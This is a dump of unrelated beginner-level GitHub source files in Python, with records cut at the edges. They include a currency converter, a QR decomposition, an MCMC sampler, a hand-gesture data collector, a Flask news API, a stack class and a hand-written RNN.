input(\n \"DESEJA VER INFORMAÇÕES DE OUTRAS MOEDAS?(s/n)\\n: \").lower().strip()[0]\n if answer_r == 's':\n info()\n elif answer_r == 'n':\n break\n else:\n print(\"DIGITE UMA RESPOSTA CONCRETA!\")\n elif answer == 3:\n print(f\"Nome: {BTCBRL['name']}\\nCotação: {BTCBRL['bid']}\\nCode: {BTCBRL['code']}\\nCodeIn: {BTCBRL['codein']}\")\n time.sleep(1)\n answer_r = input(\n \"DESEJA VER INFORMAÇÕES DE OUTRAS MOEDAS?(s/n)\\n: \").lower().strip()[0]\n if answer_r == 's':\n info()\n elif answer_r == 'n':\n break\n else:\n print(\"NÃO ENTENDI\")\n else:\n print(\"DIGITE UMA RESPOSTA CONCRETA!\")\n except:\n print(\"ERROR\")\n\n\ndef cotacao():\n while True:\n value_to_be_quoted = float(input(\"Digite o valor a ser cotado: \"))\n ab = int(input(\"ESCOLHA UMA DAS OPÇÕES ABAIXO\\n[1]USDBRL\\n[2]EURBRL\\n[3]BTCBRL\\n[4]OU VER INFORMAÇÕES SOBRE AS MOEDAS\\n: \"))\n try:\n if ab == 1:\n r = value_to_be_quoted\n t = float(USDBRL['bid'])\n l = r/t\n print(f\"COTAÇÃO ATUAL DO BRL -> USD: {l:.2f}\")\n time.sleep(1)\n exit = input(\"DESEJA VER OUTRA COTAÇÃO?(s/n)\\n: \").lower().strip()[0]\n if exit == 's':\n os.system('cls')\n continue\n elif exit == 'n':\n os.system('cls')\n break\n elif ab == 2:\n r = value_to_be_quoted\n t = float(EURBRL['bid'])\n l = r/t\n print(f\"COTAÇÃO ATUAL DO BRL -> EUR: {l:.2f}\")\n time.sleep(1)\n exit = input(\"DESEJA VER OUTRA COTAÇÃO?(s/n)\\n: \").lower().strip()[0]\n if exit == 's':\n os.system('cls')\n continue\n elif exit == 'n':\n os.system('cls')\n break\n elif ab == 3:\n r = value_to_be_quoted\n t = float(BTCBRL['bid'])\n l = r/t\n print(f\"COTAÇÃO ATUAL DO BRL -> BTC: {l:.2f}\")\n exit = input(\"DESEJA VER OUTRA COTAÇÃO?(s/n)\\n: \").lower().strip()[0]\n if exit == 's':\n 
os.system('cls')\n continue\n elif exit == 'n':\n os.system('cls')\n break\n elif ab == 4:\n os.system('cls')\n start()\n else:\n os.system('cls')\n info()\n except Exception as error:\n os.system('cls')\n print(\"ESCOLHA UMA DAS OPÇÕES\", error)\nstart()","repo_name":"WilliamRodri/python-exercises","sub_path":"converso_de_moedas/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5142,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73279151601","text":"#Exercise 4: Remove first n characters from a string\n#Write a program to remove characters from a string starting from zero up to n and return a new string.\n\n#Entry string, independent if is word or phrase.\nstring = input(\"Type a word or a phrase: \")\n\n#Require to user how many character wish to remove from start\nn = int(input(\"How many characters do you wish remove? \"))\n\n#slice string - [start:end:step]\nnewString = string[n:]\n\nprint(newString)","repo_name":"cvoznak/Exercises","sub_path":"Python/PYnative/BasicExerciseForBeginners/removeCharStrg.py","file_name":"removeCharStrg.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"36530185883","text":"'''\nAssume you want to create a dictionary object that maps keys to more than one values i.e. a Multivalued Dict\n'''\n\n#A dictionary object by default allows only one key to be assigned to a particular value at a time\n#If one wants to add multiple values to a dictionary key, it will more probably be like\n\nclass MultivaluedDict():\n \n def __init__(self):\n self.dictionary = {}\n \n def createKey(self, key_pairs): \n for key, values in key_pairs:\n if key not in self.dictionary:\n self.dictionary[key] = []\n self.dictionary[key].append(values)\n \n def __repr__(self):\n return '{}'.format(self.dictionary)\n \n#Now running this function on a set of pair one by one\nd = MultivaluedDict()\npairs = [('First', 30), ('Second',40), ('Third',50), ('First', 80), ('Third',70)]\nd.createKey(pairs)\nprint(d)\n\n#Although this is the correct method, there are alternate and more efficient ways to perform this task\n#For instance, the Collections module provides us with a function defaultDict() that allows to create Multi-valued Dictionaries for properly\n\nfrom collections import defaultdict\n\nnew_d = defaultdict(list)\nnew_d['First'].append(30)\nnew_d['Second'].append(50)\nnew_d['Third'].append(70)\nnew_d['First'].append(30)\nnew_d['Third'].append(70)\n\nprint(new_d)\n\n#Another method we can use is the setdefault method on the normal dictionary object\n\nnewer_d = {}\nnewer_d.setdefault('First', []).append(30)\nnewer_d.setdefault('Second', []).append(50)\nnewer_d.setdefault('Third', []).append(70)\nnewer_d.setdefault('First', []).append(30)\nnewer_d.setdefault('Third', []).append(70)\n\nprint(newer_d)","repo_name":"Hassan-Farid/PyTech-Review","sub_path":"Python Intermediate/Sequences and Iterables/Mapping Multiple Values to Dict.py","file_name":"Mapping Multiple Values to Dict.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"33467152748","text":"import numpy as np\nimport math\n\n# A = np.array([[1, 0], [1, 1], [0, 1]])\n# A = np.array([[1, 0], [1, 1], [1, 1]])\nA = np.array([[0, 1], [2, 3], [4, 5]])\n# A = np.array([[3, 2], [1, 5], [1, 0]])\n# A = np.array([[3, 2], [1, 5]])\n\n\ndef dlugosc(vector):\n 
result = 0\n for i in range(len(vector)):\n result += vector[i]**2\n return math.sqrt(result)\n\n\ndef projekcja(u, v):\n l = np.dot(v.T, u)\n m = np.dot(u.T, u)\n return (l/m)*u\n\n\ndef dekompozycja(A):\n Q = []\n v1 = []\n v2 = []\n for i in range(len(A)):\n v1.append(A[i][0])\n v2.append(A[i][1])\n u1 = np.array(v1)\n v2 = np.array(v2)\n e1 = u1/dlugosc(u1)\n Q.append(e1)\n u2 = v2 - projekcja(u1, v2)\n e2 = u2/dlugosc(u2)\n Q.append(e2)\n Q = np.array(Q)\n return np.array(Q.T)\n\n\nQ = dekompozycja(A)\nR = np.round(np.dot(Q.T, A), decimals=5)\nwynik = np.round(np.dot(Q, R), decimals=5)\n\n\ndef a_plus_k(A, k):\n Q = dekompozycja(A)\n if len(A) == len(A[0]):\n for i in range(k):\n Q = dekompozycja(A)\n R = np.round(np.dot(Q.T, A), decimals=5)\n A = np.round(np.dot(R, Q), decimals=5)\n return A\n\n\ndef wartosci_wlasne(A):\n new_A = A\n while (np.diag(new_A) - np.dot(new_A, np.ones((len(new_A), 1))).T).all() > 0.001:\n new_A = a_plus_k(new_A, 1)\n return np.diag(new_A)\n\n\n# ak = a_plus_k(A, 10)\nprint(A)\nprint(Q)\n# print(R)\n# print(wynik)\n# print(ak)\n# wynik = wartosci_wlasne(A)\n# print(wynik)\n","repo_name":"kacperski36/MinWiedzy","sub_path":"lab6+/pd.py","file_name":"pd.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"72239373361","text":"\nimport numpy as np\n\ndef run_chain_with_energy(E, x0, symmetric_proposal, N, thinning_factor = 1, burn_in = 0):\n \"\"\"\n Will sample N values for the chain starting with x0.\n The energy function is given by E(...) which takes a\n vector similar to x0 as argument.\n\n 'symmetric_proposal' is a function that yields the\n next position proposed. It is assumed to be symmetrical\n because we don't compensate in the ratio.\n \"\"\"\n\n if len(x0.shape) != 1:\n error(\"Wrong dimension for x0. This function is not vectorial.\")\n\n if thinning_factor < 1:\n error(\"You misunderstood the thinning_factor. 
It should be 1 for no thinning, and 32 if we want one out of every 32 samples.\")\n\n # Same algorithm as below, but running for burn_in.\n # It's a bit of code duplication.\n current_x = x0\n current_E = E(current_x)\n for _ in np.arange(0,burn_in):\n proposed_x = symmetric_proposal(current_x)\n loga = -E(proposed_x) + current_E\n if loga >= 0 or loga >= np.log(np.random.uniform(0,1)):\n current_x = proposed_x\n current_E = E(current_x)\n\n\n d = x0.shape[0]\n samples = np.zeros((N,d))\n # Start from the 'current_x' from the burn_in\n # and not from x0.\n samples[0,:] = current_x\n\n accepted_counter = 0\n rejected_counter = 0\n\n for n in np.arange(0,N-1):\n current_x = samples[n,:]\n # cache the energy to avoid recomputing\n current_E = E(current_x)\n\n for i in np.arange(0,thinning_factor):\n proposed_x = symmetric_proposal(current_x)\n loga = -E(proposed_x) + current_E\n #print \"loga = %f\" % loga\n if loga >= 0 or loga >= np.log(np.random.uniform(0,1)):\n # accepted !\n current_x = proposed_x\n current_E = E(current_x)\n accepted_counter = accepted_counter + 1\n else:\n rejected_counter = rejected_counter + 1\n\n samples[n+1,:] = current_x\n\n return (samples,\n accepted_counter * 1.0 / (accepted_counter + rejected_counter) )\n","repo_name":"gyom/denoising_autoencoder","sub_path":"focus_on_training/metropolis_hastings_sampler.py","file_name":"metropolis_hastings_sampler.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"34152457222","text":"# region giris\n# loop\n# loop ne zaman kullanılır?\n# loop → sürekli tekrarlayan işlemlerin yapılmasını sağlayan komutlardır\n\"\"\"\nprint(\"24 saatte kargoda\")\nprint(\"24 saatte kargoda\")\nprint(\"24 saatte kargoda\")\n\n\ni = 0\nwhile i<1000:\n i +=1\n print(\"12 saatte kargoda\")\n\"\"\"\n# endregion\n\n# region aman_dikkat\n\"\"\"\nwhile True:\n print(\"şu an while döngüsü içindeyim\")\n\"\"\"\n# endregion\n\n#region while_yazim_kurallari\n\"\"\"\n1 → BAŞLANGIÇ\n2 → BİTİŞ\n3 → ARTIŞ MİKTARI\n \ni = 0\nprint(\"a\")\nwhile i<=3:\n i +=1\n print(\"b\")\nprint(\"c\")\n\"\"\" \n#endregion\n\n# region dikkat_edilmesi_gereken_kurallar\n\"\"\"\ni = 1\nwhile i<3: # i büyük 3 olduğu sürece DÖN \n print(\"sponsorlu ürün\")\n\"\"\" \n# endregion\n\n# region ornek_1\n\"\"\"\ni = 1\nprint(\"a\")\nwhile i<=3:\n print(\"b\")\n i += 1\nprint(\"c\")\n\"\"\"\n# endregion\n\n# region ornek_2\n\"\"\"\nsayac = 1\nwhile sayac<=5:\n print(sayac)\n sayac += 1\n\"\"\"\n# endregion\n\n# region ornek_3\n\"\"\"\nsayac = 5\nwhile sayac: #yada sayac != 0:\n print(sayac)\n sayac -= 1\n\n\n# def. 
da siz koşulu int bir tam sayıya bağlı olarak yazarsanız\n# tam sayı 0 olduğunda döngü kırılır\n\"\"\"\n\n\nsayac = 5\ndevamMi = True\nwhile devamMi: \n print(sayac)\n if sayac==2:\n devamMi=False\n sayac -= 1\n\n\n# endregion","repo_name":"azizbektas/VSCode-Ecodation-PC","sub_path":"03_donguler/0301_donguler.py","file_name":"0301_donguler.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"tr","doc_type":"code","stars":8,"dataset":"github-code","pt":"75"} +{"seq_id":"35111670870","text":"from pathlib import Path\nimport copy\n\n# Import data\ninput_data = Path('/Kodprojekt/adventofcode/adventofcode2020/input_data')\ninput_file = input_data / 'adventofcode_input_8.txt'\nf = open(input_file, 'r')\ncontent = f.readlines()\n\n# Create list\ninstructions_input = list()\nfor line in content:\n instructions_input.append(line.split())\n\ndef run_instructions(instructions):\n \"\"\"\n Run instruction file\n \"\"\"\n index = 0\n accumulator = 0\n index_visited = list()\n\n while index not in index_visited:\n index_visited.append(index)\n instruction = instructions[index][0]\n argument = int(instructions[index][1])\n\n # Apply instruction\n if instruction == 'nop':\n index += 1\n elif instruction == 'jmp':\n index += argument\n elif instruction == 'acc':\n accumulator += argument\n index += 1\n \n # Check outcome\n if index in index_visited:\n return False, 0\n elif index == len(content):\n return True, accumulator\n\nfor i in range(len(content)):\n instructions_updated = copy.deepcopy(instructions_input)\n instruction = instructions_input[i][0]\n\n # Update instruction\n if instruction == 'nop':\n instructions_updated[i][0] = 'jmp'\n elif instruction == 'jmp':\n instructions_updated[i][0] = 'nop'\n\n # Run\n success, acc_result = run_instructions(instructions_updated)\n\n if success == True:\n print('Row ', i, ' has been changed and completed successfully!')\n print('Accumulator value: ', acc_result)\n exit()\n","repo_name":"erikasegerstrom/adventofcode2020","sub_path":"adventofcode_8_2.py","file_name":"adventofcode_8_2.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"18200832542","text":"import cv2\r\nimport mediapipe as mp\r\nimport numpy as np\r\nimport pandas as pd\r\n'''\r\n각도의 의미 학습을 시켜서 활용 가능하다.\r\n\r\n손가락 제스쳐를 활용한 컨트롤러 등\r\n\r\n주먹 stop\r\n\r\n보자기 fire\r\n'''\r\nmax_num_hands = 1\r\ngesture = { 0:'stop' , 1:'fire' }\r\n\r\nmp_hands = mp.solutions.hands\r\nmp_drawing = mp.solutions.drawing_utils\r\ncap = cv2.VideoCapture(0)\r\n\r\ntotal_result = []\r\ndef click(event,x,y,flags,params):\r\n global data\r\n if event == cv2.EVENT_LBUTTONDOWN:\r\n print('mouse click')\r\n total_result.append(data)\r\n print(data)\r\n\r\ncv2.namedWindow('Dataset')\r\ncv2.setMouseCallback('Dataset',click)\r\n\r\nwith mp_hands.Hands(max_num_hands=max_num_hands, min_detection_confidence=0.5, min_tracking_confidence=0.5) as hands:\r\n while True:\r\n ret,img = cap.read()\r\n\r\n img = cv2.flip(img,1)\r\n img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\r\n result = hands.process(img)\r\n img = cv2.cvtColor(img,cv2.COLOR_RGB2BGR)\r\n # 관절 벡터 구하기\r\n if result.multi_hand_landmarks is not None:\r\n for res in result.multi_hand_landmarks:\r\n joint = np.zeros((21,3))\r\n for j,lm in enumerate(res.landmark):\r\n joint[j] = [lm.x,lm.y,lm.z]\r\n # 관절 벡터 가져 올 묶음 쌍\r\n v1 = joint[[0,1,2,3,0,5,6,7,0,9,10,11,0,13,14,15,0,17,18,19], :]\r\n v2 = joint[[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20], 
:]\r\n v = v2 - v1\r\n # 정규화\r\n v = v / np.linalg.norm(v,axis=1)[:,np.newaxis]\r\n\r\n angle = np.arccos( np.einsum('nt,nt->n',\r\n v[[0,1,2,4,5,6,8,9,10,12,13,14,16,17,18],:],\r\n v[[1,2,3,5,6,7,9,10,11,13,14,15,17,18,19],:]\r\n ) )\r\n\r\n angle = np.degrees(angle)\r\n data = np.array([angle],dtype=np.float32)\r\n data = np.append(data, 3)\r\n\r\n mp_drawing.draw_landmarks(img,res,mp_hands.HAND_CONNECTIONS)\r\n\r\n cv2.imshow('Dataset',img)\r\n if cv2.waitKey(1) == ord('q'):\r\n break\r\n'''\r\neinsum 하면 rad 값이 구해짐. \r\n\r\n아니면 각각의 벡터를 하나하나씩 반복문 돌려서 해 주어야 함.\r\n\r\n키를 누를 때마다 학습 데이터 저장하기\r\n'''\r\ntotal_result = np.array(total_result,dtype=np.float32)\r\ndf = pd.DataFrame(total_result)\r\nprint(total_result)\r\ndf.to_csv('hand.csv',mode='a',index=None,header=None)\r\nprint('=========end==============')","repo_name":"joowop/Metaverse_AI_Project","sub_path":"posetest/hand_gesture.py","file_name":"hand_gesture.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"27217586111","text":"from flask import Flask, request\nfrom flask_cors import CORS\nfrom history import History\nfrom datetime import datetime\nfrom sentiment import content_score\nfrom statistics import avg_score, most_common_author, most_common_source, read_bias_ratio\nimport json\nimport requests\nimport os\n\nAPP = Flask(__name__)\nCORS(APP)\n\nwith open(\"news.json\") as f:\n news = json.load(f)\n\n@APP.route(\"/\", methods=[\"GET\"])\ndef root():\n \"\"\" default route \"\"\"\n\n return \"
Welcome to Uplift's backend API!
\"\n\n@APP.route('/news', methods=[\"GET\"])\ndef get_news():\n \"\"\" Get general news for a particular topic \"\"\"\n\n search = request.args.get(\"search\")\n response = requests.get(f\"{news['base_url']}/v2/everything?apiKey={news['api_key']}&q={search}\").json()\n article_list = response['articles'][:15]\n for item in article_list:\n item['score'] = content_score(item['title'], item['description'], item['content'])\n \n return {'articles': article_list}\n\n@APP.route('/news/headlines', methods=[\"GET\"])\ndef get_news_headlines():\n \"\"\" Get the top headlines for a particular topic, category and/or country \"\"\"\n\n search = request.args.get(\"search\")\n category = request.args.get(\"category\")\n country = request.args.get(\"country\")\n query_string = \"\"\n \n if search:\n query_string += f\"&q={search}\"\n if category:\n query_string += f\"&category={category}\"\n if country:\n query_string += f\"&country={country}\"\n # print(f\"{query_string=}\")\n response = requests.get(f\"{news['base_url']}/v2/top-headlines?apiKey={news['api_key']}{query_string}\").json()\n article_list = response['articles'][:15]\n for item in article_list:\n item['score'] = content_score(item['title'], item['description'], item['content'])\n \n return {'articles': article_list}\n\n@APP.route('/history/add', methods=[\"POST\"])\ndef history_add():\n \"\"\" \n Add details for an article read by the user with uuid \n \n Parameters:\n - uuid\n - title\n - author\n - description\n - content\n - source\n \"\"\"\n\n history = History(\"database.json\")\n body = request.json\n score = content_score(body['title'], body['description'], body['content'])\n\n now = datetime.now()\n time_added = now.strftime(\"%H:%M:%S\")\n\n return history.add(body[\"uuid\"], body[\"title\"], body[\"source\"], score, body[\"author\"], time_added)\n\n@APP.route('/history', methods=[\"GET\"])\ndef history():\n \"\"\" get a list of articles for all articles already read by the user with uuid \"\"\"\n\n uuid = request.args.get(\"uuid\")\n history = History(\"database.json\")\n return {\n \"history\": history.visited(uuid)\n }\n\n@APP.route('/stats', methods=[\"GET\"])\ndef stats():\n \"\"\" give statistics based on user history \"\"\"\n uuid = request.args.get(\"uuid\")\n\n return {\n \"avg_score\": avg_score(uuid),\n \"most_common_author\": most_common_author(uuid),\n \"most_common_source\": most_common_source(uuid),\n \"bias_ratio\": read_bias_ratio(uuid)\n }\n\n\nif __name__ == \"__main__\":\n APP.run(host=\"0.0.0.0\", debug=True, port=8080)\n","repo_name":"CSESoc-Hackathon-Uplift/Backend","sub_path":"src/server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"43792080212","text":"r\"\"\"Parse all the results of Kahle Michalek (in directory ``all-qpoly/``) \nand save the results in json format in a directory ``all-qpoly-json/``.\n\nThis is a script.\n\nTo recover the data in python, for instancxe the data corresponding to the label \"3\", use:\n```\nimport json\n\nwith (\"all-qpoly-json/3.json\") as f:\n res = json.load(f)\n```\n\nThis script should run from within the directory that contains the subdirectories \n``all-qpoly/`` and ``all-qpoly-json/``\nfrom shell with::\n python -m parse_to_json.py\n \nor from within python with::\n execfile('parse_to_json.py')\n\"\"\"\nimport json, os, barvinok_parser\n\nOUTPUT_DIR = \"all-qpoly-json/\"\nINPUT_DIR = \"all-qpoly/\"\n\nwith os.scandir(INPUT_DIR) as 
input_dir: # os.scandir for python >= 3.5\n for entry in input_dir:\n if entry.name.endswith(\".qpoly\") and entry.is_file():\n output_file = entry.name[:-len(\".qpoly\")] + \".json\"\n print(\"{} -> {}\".format(entry.name, output_file))\n with open(entry.path, 'r') as f:\n data = f.read()\n res = barvinok_parser.parse_function(data)\n with open(os.path.join(OUTPUT_DIR, output_file), 'w') as f:\n json.dump(res, f, indent=4)\n","repo_name":"EmmanuelJeanBriand/qpoly_plethysm","sub_path":"parse_to_json.py","file_name":"parse_to_json.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"8577803931","text":"from django.conf.urls import url\nfrom django.contrib.auth.decorators import login_required\n\nfrom . import views\n\napp_name = 'music'\nurlpatterns = [\n\n # /music/login\n url(r'login/$', views.login_user, name='login'),\n\n # /music/check_login\n url(r'login_check/$', views.login_check, name='login_check'),\n\n # /music\n url(r'^$', views.index, name='index'),\n\n # /music/songs\n url(r'songs/$', views.get_songs, name='songs'),\n\n # /music/register/\n url(r'^register/$', login_required(views.UserFormView.as_view()), name='register'),\n\n # /music//\n url(r'^(?P[0-9]+)/$', views.detail, name='detail'),\n\n # /music/album/add/\n url(r'album/add/$', login_required(views.AlbumCreate.as_view()), name='create'),\n\n # /music/song/add\n url(r'song/add/$', login_required(views.SongCreate.as_view()), name='song_create'),\n\n # /music/album//\n url(r'album/(?P[0-9]+)/$', login_required(views.AlbumUpdate.as_view()), name='album_update'),\n\n # /music/song//\n url(r'song/(?P[0-9]+)/$', login_required(views.SongUpdate.as_view()), name='song_update'),\n\n # /music/album//delete/\n url(r'album/(?P[0-9]+)/delete/$', login_required(views.AlbumDelete.as_view()), name='delete'),\n\n # /music/logout\n url(r'logout/$', views.logout_user, name='logout'),\n\n # /music//favourite/\n # url(r'^(?P[0-9]+)/favourite/$', views.favourite, name='favourite'),\n]\n","repo_name":"PrajwalRavi/Musik","sub_path":"music/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"10621192644","text":"#%%\nimport sys\ninput = sys.stdin.readline\n\n#%%\nclass Stack:\n def __init__(self):\n self.stack = []\n self.func_list = {\n 'push': Stack.push,\n 'pop': Stack.pop,\n 'size': Stack.size,\n 'empty': Stack.empty,\n 'top': Stack.top,\n }\n\n def push(self, n):\n n = int(n)\n self.stack.append(n)\n\n def pop(self):\n try:\n print(self.stack.pop())\n except:\n print(-1)\n\n def size(self):\n print(len(self.stack))\n\n def empty(self):\n if not self.stack:\n print(1)\n else:\n print(0)\n\n def top(self):\n try:\n print(self.stack[-1])\n except:\n print(-1)\n\n def str_to_func(self, string):\n func_name, *arg = string.split()\n self.func_list[func_name](self,*arg)\n\n#%%\nstack = Stack()\nfor i in range(int(input())):\n stack.str_to_func(input())\n# %%\n# stack.push1(3)\n# stack.str_to_func('push 1')\n# stack.str_to_func('top')\n# print(stack.stack)","repo_name":"JungYongHui/Coding-Test","sub_path":"JH/10828_스택/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"6460456663","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\nclass Rnn:\r\n # constructor: instance value 
for Rnn instance\r\n def __init__(self):\r\n # constant value--dimension\r\n self.m = 1 # dimension of output vector\r\n self.n = 30 # dimension of vector of hidden state\r\n self.p = 1 # dimension of input vector\r\n self.step = 10 # maximum length of sequence\r\n self.batch_size = 32\r\n self.pre_step = 1 # maximum length of prediction sequence\r\n self.initial = 1.52\r\n # other value--parameter matrix\r\n self.v = np.random.uniform(-self.initial, self.initial, (self.m, self.n)) #\r\n self.w = np.random.uniform(-self.initial/self.n, self.initial/self.n, (self.n, self.n)) #\r\n self.u = np.random.uniform(-self.initial, self.initial, (self.n, self.p)) #\r\n self.rnn_cells = [Rnn.RnnCell(self)] # Rnn cell array of Rnn instance\r\n self.losses = np.empty(0) # loss of each prediction of Rnn instance\r\n self.input_mat = np.zeros((0, 0)) # matrix containing input vectors\r\n self.output_mat = np.zeros((0, 0)) # matrix containing output vectors\r\n self.input_length = 0 #\r\n self.output_length = 0 # defined by user\r\n self.output_start = 0 # defined by user, default 1\r\n self.train_time = 3000 #\r\n self.learning_rate = 0.001 #\r\n\r\n class RnnCell:\r\n def __init__(self, rnn_obj):\r\n self.ot = np.zeros((rnn_obj.m, 1)) # output vector\r\n self.st = np.zeros((rnn_obj.n, 1)) # hidden vector\r\n self.xt = np.zeros((rnn_obj.p, 1)) # input vector\r\n self.yt = self.ot # actual result\r\n self.ot0 = self.ot # output vector before softmax activation\r\n self.st0 = self.st # hidden vector before sigmoid activation\r\n self.lt_partial_u = np.zeros_like(rnn_obj.u) # contribution to gradient of u\r\n self.lt_partial_w = np.zeros_like(rnn_obj.w) # contribution to gradient of w\r\n self.lt_partial_v = np.zeros_like(rnn_obj.v) # contribution to gradient of v\r\n self.st0_partial_u = np.zeros((rnn_obj.n, rnn_obj.n * rnn_obj.p)) # iteration\r\n self.st0_partial_w = np.zeros((rnn_obj.n, rnn_obj.n * rnn_obj.n)) # iteration\r\n\r\n # calculation method for RnnCell\r\n def cross_entropy_loss(self):\r\n return\r\n\r\n def mse_loss(self): # input is a vector, return is a vector\r\n return np.sum((self.ot - self.yt) ** 2)\r\n\r\n def partial_mse(self): # input is a vector, return is a vector\r\n return 2*(self.ot-self.yt)\r\n\r\n def sigmoid(self): # input is a vector, return is a vector\r\n return np.ones_like(self.st0) / (np.ones_like(self.st0) + np.exp(-self.st0))\r\n\r\n def partial_sigmoid(self): # input is a vector, return is a vector\r\n return self.st * (np.ones_like(self.st) - self.st)\r\n\r\n def tanh(self):\r\n return (np.exp(self.st0) - np.exp(-self.st0)) / (np.exp(self.st0) + np.exp(-self.st0))\r\n\r\n def partial_tanh(self):\r\n return np.ones_like(self.st) - self.st ** 2\r\n\r\n def softmax(self): # input is a vector, return is a vector\r\n # x=x-np.max(x) # compute in a stable way # hard to differentiate\r\n return np.exp(self.ot0) / np.sum(np.exp(self.ot0))\r\n\r\n def partial_softmax(self): # input is a vector, return is a matrix\r\n return np.diag(self.ot) - self.ot @ self.ot.transpose()\r\n\r\n # training method for Rnn instance\r\n def get_data(self, data):\r\n self.input_mat = np.reshape(data, (self.p, np.size(data)))\r\n return np.size(data)\r\n\r\n def forward_propagate(self):\r\n for i in np.arange(1, self.batch_size+1, 1):\r\n self.rnn_cells[i].st0 = self.u @ self.rnn_cells[i].xt + self.w @ self.rnn_cells[i-1].st\r\n self.rnn_cells[i].st = self.rnn_cells[i].tanh()\r\n\r\n # rnn_cell[self.step] need to be specially tackled\r\n self.rnn_cells[self.batch_size].ot0 = self.v @ 
self.rnn_cells[self.batch_size].st\r\n self.rnn_cells[self.batch_size].ot = self.rnn_cells[self.batch_size].ot0\r\n lose = self.rnn_cells[self.batch_size].mse_loss()\r\n\r\n for i in np.arange(self.batch_size+1, self.batch_size+self.pre_step, 1):\r\n self.rnn_cells[i].xt = self.rnn_cells[i-1].ot\r\n self.rnn_cells[i].st0 = self.u @ self.rnn_cells[i].xt + self.w @ self.rnn_cells[i-1].st\r\n self.rnn_cells[i].st = self.rnn_cells[i].tanh()\r\n self.rnn_cells[i].ot0 = self.v @ self.rnn_cells[i].st\r\n self.rnn_cells[i].ot = self.rnn_cells[i].ot0 # no activation in output layer\r\n lose = lose + self.rnn_cells[i].mse_loss()\r\n return lose\r\n\r\n def back_propagate(self):\r\n du = np.zeros_like(self.u) # initialize du, dw, dv\r\n dw = np.zeros_like(self.w)\r\n dv = np.zeros_like(self.v)\r\n for i in np.arange(self.batch_size-self.step, self.batch_size+self.pre_step, 1):\r\n lt_partial_ot = self.rnn_cells[i].partial_mse()\r\n lt_partial_st0 = (self.v.transpose() @ lt_partial_ot) * self.rnn_cells[i].partial_tanh()\r\n self.rnn_cells[i].st0_partial_u = \\\r\n np.kron(np.eye(self.n), self.rnn_cells[i].xt.transpose()) + self.w @ \\\r\n (np.kron(np.ones((1, self.n * self.p)), self.rnn_cells[i].partial_tanh()) *\r\n self.rnn_cells[i-1].st0_partial_u)\r\n self.rnn_cells[i].st0_partial_w = \\\r\n np.kron(np.eye(self.n), self.rnn_cells[i-1].st.transpose()) + self.w @ \\\r\n (np.kron(np.ones((1, self.n * self.n)), self.rnn_cells[i-1].partial_tanh()) *\r\n self.rnn_cells[i-1].st0_partial_w)\r\n self.rnn_cells[i].lt_partial_u = np.reshape(lt_partial_st0.transpose() @ self.rnn_cells[i].st0_partial_u,\r\n (self.n, self.p))\r\n self.rnn_cells[i].lt_partial_w = np.reshape(lt_partial_st0.transpose() @ self.rnn_cells[i].st0_partial_w,\r\n (self.n, self.n))\r\n self.rnn_cells[i].lt_partial_v = lt_partial_ot @ self.rnn_cells[i].st.transpose()\r\n du = du + self.rnn_cells[i].lt_partial_u\r\n dw = dw + self.rnn_cells[i].lt_partial_w\r\n dv = dv + self.rnn_cells[i].lt_partial_v\r\n\r\n self.u = self.u - self.learning_rate * self.rnn_cells[self.batch_size].lt_partial_u\r\n self.w = self.w - self.learning_rate * self.rnn_cells[self.batch_size].lt_partial_w\r\n self.v = self.v - self.learning_rate * self.rnn_cells[self.batch_size].lt_partial_v\r\n return\r\n\r\n def train(self, data):\r\n # process input data and initialize array of Rnn cells as well as array of losses\r\n self.input_length = self.get_data(data)\r\n self.losses = np.empty(self.train_time)\r\n\r\n # self.train_time is times of training\r\n # in each time of training, randomly choose a batch of self.step samples\r\n # create an array of self.step Rnn cells\r\n # forward propagate and back_propagate respectively\r\n for i in np.arange(0, self.train_time, 1):\r\n self.rnn_cells = [Rnn.RnnCell(self)] * (self.batch_size+self.pre_step) # create an array of Rnn cell\r\n begin = np.random.randint(1, self.input_length-self.batch_size-self.pre_step+1) # start of training step\r\n\r\n print(i, \": begin: \", begin)\r\n\r\n for j in np.arange(begin, begin+self.batch_size, 1): # initialize input for training network\r\n self.rnn_cells[j-begin+1].xt = np.reshape(self.input_mat[:, j-1], (self.p, 1))\r\n for j in np.arange(begin, begin+self.batch_size+self.pre_step-1, 1):\r\n self.rnn_cells[j-begin+1].yt = np.reshape(self.input_mat[:, j], (self.p, 1))\r\n self.losses[i] = self.forward_propagate()\r\n self.back_propagate()\r\n return\r\n\r\n # predicting method for Rnn instance\r\n def predict(self, output_start, output_length):\r\n self.output_start = output_start\r\n 
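        # Editor's note (added): predict() below first runs `output_start`
        # teacher-forced steps from the stored inputs (self.input_mat), then
        # switches to closed loop, feeding each cell's output ot back in as
        # the next cell's input xt for the remaining forecast steps. A tiny,
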